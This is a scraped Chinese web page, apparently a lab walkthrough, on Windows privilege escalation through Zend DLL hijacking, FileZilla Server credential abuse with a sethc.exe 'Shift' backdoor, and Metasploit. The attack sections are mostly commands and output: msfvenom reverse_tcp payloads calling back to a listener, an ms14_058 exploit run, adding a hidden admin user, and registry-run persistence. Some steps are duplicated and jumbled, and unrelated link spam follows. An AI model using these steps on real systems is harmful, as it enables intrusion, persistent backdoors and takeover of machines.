https://dwd.jb51.net/201111/yuanma/asp_rw_cx.rar

8.2.2 生成恶意文件

利用工具:Zend_DLL_Hijacking_for_nc.exe、cmd.exe、nc.exe

image-20210717190928823

8.2.3 利用恶意文件

  1. 重命名靶机的 ZendExtensionManager.dll 文件名为old.dll
  2. 在目标主机 ZendExtensionManager.dll 所在的文件夹上传工具所生成的 ZendExtensionManager.dll 、 nc.exe 、cmd.exe 三个文件
  3. 重启靶机,访问靶机的 php 页面,触发 payload 加载。
  4. 使用本地主机 telnet 远程连接靶机

8.3 利用过程:执行恶意软件

8.3.1 查找 ZendExtensionManager.dll 文件目录

上传查询目录读写信息的脚本文件,并访问该页面进行查询,确认靶机 ZendExtensionManager.dll 文件与目录具有可读可写权限

https://dwd.jb51.net/201111/yuanma/asp_rw_cx.rar

8.2.2 生成恶意文件

利用工具:Zend_DLL_Hijacking.exe、bak.exe(恶意软件)

image-20210717205402650

8.2.3 利用恶意文件

  1. 重命名靶机的 ZendExtensionManager.dll 文件名为old.dll
  2. 在目标主机 ZendExtensionManager.dll 所在的文件夹上传工具所生成的 ZendExtensionManager.dll 、 bak.exe 两个文件
  3. 重启靶机,访问靶机的 php 页面,触发 payload 加载。
  4. 使用本地主机 telnet 远程连接靶机

8.2.4 使用 Kali 制作后门软件

# 制作后门软件,
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.100.128 lport=9999 -f exe > bak.exe# 本地监听端口
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.128
set lport 9999
run

9 FileZilla 提权

FileZilla 是一款开源的 FTP 服务器和客户端软件,若安装了服务器端默认侦听 127.0.0.1:14147 ,默认安装目录下有两个敏感文件 FileZilla Server Interface.xml、FileZilla Server.xml

9.1 利用原理

  1. 下载 FileZilla Server Interface.xml、FileZilla Server.xml 文件,获得管理员密码;
  2. 配置端口转发,远程管理 ftpserver
  3. 创建 ftp 用户,分配权限,设置家目录为 C:\
  4. 使用 cmd.exe 改名为 sethc,exe 替换 C:\windows\system32\sethc.exe 生成 shift 后门
  5. mstsc 连接 3389 按 5 次 shift 调出 cmd.exe

9.2 利用过程

9.2.1 查看敏感文件

通过 webshell 查找 FileZilla Server Interface.xml、FileZilla Server.xml 文件,一般在目录 C:\Program Files\FileZilla Server\ 中。

image-20210717210703893

查看敏感信息:从以下图片中可以看出,密码为:123456,FileZilla 侦听的地址为:127.0.0.1:14147

image-20210717205315680

9.2.2 配置端口转发

利用工具:lcx 端口转发工具

由于 FileZilla 使用的是本地的 14147 端口,我们需要利用 lcx.exe 配置端口转发将本地的 14147 端口转发到 14148 端口

  1. 通过 webshell 将 lcx.exe 上传到可执行目录下。

  2. 通过 webshell 执行以下命令,配置端口转发。

    lcx.exe -tran 14148 127.0.0.1 14147
    

    image-20210717212246055

  3. 远程管理 ftpserver,下载 FileZilla 并远程登录靶机 ftpserver

    image-20210717214351631

9.2.3 创建 ftp user 并分配权限

在2003系统中,FileZilla 服务器是以系统权限启动的,可以修改默认的位置为 C 盘根目录

image-20210717214704879

9.2.4 创建 shift 后门

使用创建的 ftp user 登录到靶机

image-20210717215151241

通过 ftp 客户端,将 cmd.exe 改名为 sethc.exe,并替换靶机的 C:\windows\system32\sethc.exe 生成 shift 后门

9.2.5 测试后门

mstsc 连接 3389 按 5 次 shift 调出 cmd.exe

10 MSF 中 Windows 提权完整流程

10.1 MSF 中 windows 提权模块

metasploit 提权EXP 存储文件夹路径 /usr/share/metasploit-framework/modules/exploits/windows/local/

ms14_058 内核模式驱动程序中的漏洞可能允许远程执行代码
exploit/windows/local/ms14_058_track_popup_menums16_016 WebDAV本地提权漏洞(CVE-2016-0051)
exploit/windows/local/ms16_016_webdavms16_032 MS16-032 Secondary Logon Handle 本地提权漏漏洞
exploit/windows/local/ms16_032_secondary_logon_handle_privesc

10.2 利用 MSF 生成反向 shell payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.100.128 lport=8888 -f exe > 8888.exe

10.3 本地开启监听

msfconsole 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.128
set lport 8888
exploit/run

10.4 上传 Payload

将生成的 Payload 通过 Webshell 上传到靶机的可执行目录中

通过 cmdshell 运行 payload,获得一个 NT AUTHORITY\NETWORK SERVICE 用户权限

image-20210718004009217

10.5 提权

System Commands

Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process 尽可能提升权限
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as 查看当前用户
kill          Terminate a process
localtime     Displays the target system local date and time
pgrep         Filter processes by name
pkill         Terminate processes by name
ps            List running processes 列出进程
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS 查看系统信息
migrate       Migrate the server to another process 注入进程
getsystem     Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限

10.5.1 使用 getsystem 提权

由以下信息可知,提权失败

meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)

10.5.2 使用模块进行提权

use exploit/windows/local/ms14_058_track_popup_menu
set session 3
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run [*] Started reverse TCP handler on 192.168.100.128:4444 
[*] Launching notepad to host the exploit...
[+] Process 2388 launched.
[*] Reflectively injecting the exploit DLL into 2388...
[*] Injecting exploit into 2388...
[*] Sending stage (175174 bytes) to 192.168.100.131
[*] Exploit injected. Injecting payload into 2388...
[*] Payload injected. Executing exploit...
[*] Sending stage (175174 bytes) to 192.168.100.131
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 4 opened (192.168.100.128:4444 -> 192.168.100.131:1105) at 2021-07-18 11:30:50 +0800
[*] Meterpreter session 5 opened (192.168.100.128:4444 -> 192.168.100.131:1107) at 2021-07-18 11:30:51 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# 提权成功

10.5.3 migrate 注入进程

防止目标关闭 8888.exe 程序,最好将进程进行迁移

# 通过 ps 命令获取靶机的进程
ps# 防止目标关闭 8888.exe 程序,将进程进行迁移,如迁移至 explorer.exe
meterpreter > migrate 2916
[*] Migrating from 192 to 2916...
[*] Migration completed successfully.也可以在设置提权 exp 时,设置自动脚本进行自动迁移
set autorunscript migrate -n explorer.exe 

10.6 持久后门

内网渗透----常见后门_浅笑996的博客-CSDN博客

  • 利用漏洞取得的 metepreter 运行在内存中,重启失效
  • 重复 exploit 漏洞可能造成服务崩溃
  • 持久后门保证漏洞修复后仍可远程控制

10.6.1 增加管理员run exploit/windows/local/persistence

 net user test 123456 /add && net localground administrators test /add# 在 kali 里面链接远程终端
rdesktop 192.168.100.131

10.6.2 persistence 后门

use exploit/windows/local/persistence
set session 6
# session 6 为已获得最高权限的 session
set delay 30
set lhost 192.168.100.128
set lport 88888
msf6 exploit(windows/local/persistence) > 
[*] Running persistent module against WINDOES-TARGET01 via session ID: 6
[!] Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!
[+] Persistent VBS script written on WINDOES-TARGET01 to C:\WINDOWS\TEMP\bvifQmDbl.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AZkTNi
[+] Installed autorun on WINDOES-TARGET01 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AZkTNi
[*] Clean up Meterpreter RC file: /root/.msf4/logs/persistence/WINDOES-TARGET01_20210718.0646/WINDOES-TARGET01_20210718.0646.rc
查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. 148. 排序链表

    题目 来源&#xff1a;力扣&#xff08;LeetCode&#xff09; 链接&#xff1a;https://leetcode-cn.com/problems/sort-list 著作权归领扣网络所有。商业转载请联系官方授权&#xff0c;非商业转载请注明出处。 给你链表的头结点 head &#xff0c;请将其按 升序 排列并返回 …...

    2024/4/20 14:54:19
  2. 2021-2027中国商用车轮胎帘线和织物市场现状及未来发展趋势

    【报告篇幅】&#xff1a;140 【报告图表数】&#xff1a;172 【报告出版时间】&#xff1a;2021年10月 【报告出版机构】&#xff1a;恒州博智(QYR)化工及材料研究中心 报告摘要 2020年中国商用车轮胎帘线和织物市场规模达到了 亿元&#xff0c;预计2027年可以达到 亿元&am…...

    2024/4/13 17:21:37
  3. 2021-2027全球与中国牛肉罐头市场现状及未来发展趋势

    2021-2027全球与中国牛肉罐头市场现状及未来发展趋势 本报告研究全球与中国市场牛肉罐头的产能、产量、销量、销售额、价格及未来趋势。重点分析全球与中国市场的主要厂商产品特点、产品规格、价格、销量、销售收入及全球和中国市场主要生产商的市场份额。历史数据为2016至2020…...

    2024/4/15 4:41:51
  4. SDCC和Keil之stc89c52资料(纪念51单片机40周年)

    使用Linux环境进行单片机教学已经3年了&#xff0c;反馈一般&#xff0c;部分学生给出差评&#xff0c;也在情理之中。 为何选择SDCC&#xff0c;一开始就明确说明了&#xff0c;不是keil不好&#xff0c;但是很贵啊&#xff0c;课程尊重知识产权&#xff0c;不鼓励x行为。 关…...

    2024/4/20 18:36:12
  5. Fastdfs搭建及springboot集成封装

    背景&#xff1a;有机会从0-1架构设计智慧消防领域的解决方案项目&#xff0c;涉及到文件的存储&#xff0c;果断放弃了传统的服务器直接文件存储和ftp存储&#xff0c;选择使用国内比较热的fastdfs&#xff0c;新的项目肯定选择使用最新的版本V6.07&#xff0c;记录下Fastdfs的…...

    2024/4/15 4:41:46
  6. 高年薪的Web前端工程师经常思考哪些问题?

    为什么同样从事Web前端开发工作&#xff0c;有的人能拿到较高的薪资&#xff0c;而有的人却只能达到行业平均水平。优秀的Web前端工程师除了技术更高超之外&#xff0c;他们在思考问题上也更全面&#xff0c;那么想要成为一名高年薪的Web前端工程师需要经常思考哪些问题。下面&…...

    2024/4/15 4:41:46
  7. python之按照excel某列字段将一个文件拆分成多个文件。

    需求描述&#xff1a;将一个excel文件按照某一列字段拆分成多个文件。比如将图一表格按照专业拆分成人力资源管理、会计、市场营销3个文件&#xff0c;并以专业名称命名文件名。效果见图二。 功能实现&#xff1a;主要利用groupby函数。 图一&#xff1a; 图二&#xff1a; #…...

    2024/4/15 4:42:11
  8. SpringMVC拦截器

    SpringMVC拦截器 拦截器介绍 Spring MVC提供的拦截器就类似于Servlet-api中的过滤器&#xff0c;可以对控制器的请求拦截实现相关的预处理和后处理。 过滤器 基于Servlet-api的实现&#xff0c;是Servlet规范的一部分&#xff0c;所有的web项目都可以使用在web.xml配置&#x…...

    2024/4/15 4:41:41
  9. 2021-2027全球与中国目录软件市场现状及未来发展趋势

    2021-2027全球与中国目录软件市场现状及未来发展趋势 本文重点分析在全球及中国有重要角色的企业&#xff0c;分析这些企业目录软件产品的市场规模、市场份额、市场定位、产品类型以及发展规划等。 主要企业包括&#xff1a; Brilliant Directories CridioStudio e…...

    2024/4/20 11:36:14
  10. 2021-2027中国汽车轮胎帘线和织物市场现状及未来发展趋势

    【报告篇幅】&#xff1a;141 【报告图表数】&#xff1a;172 【报告出版时间】&#xff1a;2021年10月 【报告出版机构】&#xff1a;恒州博智(QYR)化工及材料研究中心 报告摘要 2020年中国汽车轮胎帘线和织物市场规模达到了 亿元&#xff0c;预计2027年可以达到 亿元&…...

    2024/4/20 2:49:56
  11. HTML5期末大作业:影视电影网站设计—— 迪士尼影视电影(6页) HTML+CSS+JavaScript 网页设计期末课程大作业 web前端开发技术 web课程设计 网页规划与设计

    HTML5期末大作业&#xff1a;影视电影网站设计—— 迪士尼影视电影(6页) HTMLCSSJavaScript 网页设计期末课程大作业 web前端开发技术 web课程设计 网页规划与设计 常见网页设计作业题材有 个人、 美食、 公司、 学校、 旅游、 电商、 宠物、 电器、 茶叶、 家居、 酒店、 舞蹈…...

    2024/4/15 4:41:46
  12. 算法图解 PDF 原文内容分享

    本书示例丰富&#xff0c;图文并茂&#xff0c;以让人容易理解的方式阐释了算法&#xff0c;旨在帮助程序员在日常项目中更好地发挥算法的能量。书中的前三章将帮助你打下基础&#xff0c;带你学习二分查找、大O表示法、两种基本的数据结构以及递归等。余下的篇幅将主要介绍应用…...

    2024/4/16 13:20:24
  13. Learun FrameWork 强大工作流引擎,让OA更智能

    互联网的发展促使企业在信息化的道路上不断探索,而随着企业信息化进程的不断深入,OA协同办公的概念也逐步进入大众的视野。OA的选型关乎企业的生存发展,除了需要重视“OA技术、OA品牌、OA产品、OA服务”四大要素之外,更重要的其实是让OA变得智能化的工作流引擎。毫不夸张的…...

    2024/4/19 18:14:26
  14. 2021-2027中国商用车轮胎金属帘线市场现状及未来发展趋势

    【报告篇幅】&#xff1a;125 【报告图表数】&#xff1a;170 【报告出版时间】&#xff1a;2021年10月 【报告出版机构】&#xff1a;恒州博智(QYR)化工及材料研究中心 报告摘要 2020年中国商用车轮胎金属帘线市场规模达到了 亿元&#xff0c;预计2027年可以达到 亿元&…...

    2024/4/19 7:40:00
  15. EditableProTable组件的使用

    代码样例 import { EditableProTable } from ant-design/pro-table; export default () > {const [position, setPosition] useState(bottom);const TagList ({ value, onChange }) > {const ref useRef(null);const [newTags, setNewTags] useState([]);const [inp…...

    2024/4/15 4:42:37
  16. 笔记:get,post和注解(2021.11.3)

    http&#xff1a; 超文本传输协议 URI&#xff1a;Uniform Resource Identifiers 统一资源标识符 HTTP 请求方法 根据 HTTP 标准&#xff0c;HTTP 请求可以使用多种请求方法。 HTTP1.0 定义了三种请求方法&#xff1a; GET, POST 和 HEAD 方法。 HTTP1.1 新增了六种请求方…...

    2024/4/19 4:52:52
  17. 动态规划——机器人走路

    题目一 假设有排成一行的N个位置&#xff0c;记为&#xff1a;1~N&#xff0c;N一定大于或等于2 开始时机器人在其中的M位置上(M一定是1~N中的一个) 如果机器人来到1的位置&#xff0c;那么下一步只能往右来到2的位置 如果机器人来到N的位置&#xff0c;那么下一步只能往左来到…...

    2024/4/15 4:42:57
  18. 【RTOS】FreeRTOS+LWIP启动后网线再插入时,无法ping通的解决办法

    1、确认STM32CubeMx打开了下面的宏定义 2、void ethernetif_update_config(struct netif *netif)函数&#xff0c;新增以下代码 为方便复制粘贴&#xff0c;代码如下 if(netif_is_link_up(netif)){netif_set_up(netif);}else{netif_set_down(netif);}3、先上电等待系统启动以…...

    2024/4/15 4:43:28
  19. web前端专业学习你应该了解的25个JS技巧

    写代码的时候总有一些东西是会重复出现的&#xff0c;次数多了你就会想找找捷径了。这类问题中有很大一部分解决起来甚至连库都不用装。 下面就是我多年来收集的前 25 个捷径和小技巧。 1、类型检查小工具 JavaScript 不是强类型语言&#xff0c;对此我推荐的最佳解决方案是…...

    2024/4/15 4:42:47
  20. H265/HEVC视频码流分析

    一、H265概述 H265/HEVC&#xff08;Hight Efficiency Video Coding&#xff09;是由ITU-T和ISO/IEC两大组织在H264/AVC的基础之上推出的新一代高效视频编码标准&#xff0c;主要为应对高清和超高清视频在网络传输和数据存储方面带来的挑战。上一篇文章对H264/AVC视频码流进行了…...

    2024/4/19 7:12:05

最新文章

  1. DFS专题:电话号码的字母组合

    DFS专题&#xff1a;电话号码的字母组合 题目链接: 17.电话号码的字母组合 参考题解&#xff1a; 代码随想录 题目描述 代码思路 将数字到字母的映射用字符串数组表示出来。然后利用回溯算法&#xff0c;解决n个for循环的问题&#xff0c;枚举出每一种符合要求的情况。 代…...

    2024/4/20 18:41:43
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. uniApp使用textarea,默认高度且文字多后自适应设置

    需求是有一个默认高度且文字溢出时需要自适应高度 代码如下 <textarea model:value"{{text}}" auto-height placeholder"请输入内容" maxlength"-1" />textarea {border: 1px solid rgb(201, 201, 201); // 边框padding: 15rpx; // 内边…...

    2024/4/14 18:22:48
  4. dp小兰走迷宫

    昨天学习了bfs的基本概念&#xff0c;今天来做一道经典习题练练手吧&#xff01; bfs常用的两类题型 1.从A出发是否存在到达B的路径(dfs也可) 2.从A出发到B的最短路径&#xff08;数小:<20才能用dfs&#xff09; 遗留的那个问题的答案- 题目&#xff1a;走迷宫 #incl…...

    2024/4/20 8:28:21
  5. 【嵌入式开发 Linux 常用命令系列 4.3 -- git add 不 add untracked file】

    请阅读【嵌入式开发学习必备专栏 】 文章目录 git add 不add untracked file git add 不add untracked file 如果你想要Git在执行git add .时不添加未跟踪的文件&#xff08;untracked files&#xff09;&#xff0c;你可以使用以下命令&#xff1a; git add -u这个命令只会加…...

    2024/4/19 7:49:41
  6. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/4/19 14:24:02
  7. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/4/19 18:20:22
  8. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/19 11:57:31
  9. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/4/19 11:57:31
  10. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/19 11:57:52
  11. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/19 11:57:53
  12. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/19 11:58:14
  13. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/19 11:58:20
  14. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/20 7:40:48
  15. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/4/19 11:58:39
  16. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/19 11:58:51
  17. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/20 3:12:02
  18. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/19 11:59:15
  19. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/19 11:59:23
  20. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/4/19 11:59:44
  21. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/4/19 11:59:48
  22. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/19 12:00:06
  23. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/19 16:57:22
  24. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/4/19 12:00:25
  25. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/19 12:00:40
  26. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  27. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  28. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  29. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  30. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  31. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  32. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  33. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  34. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  35. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  36. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

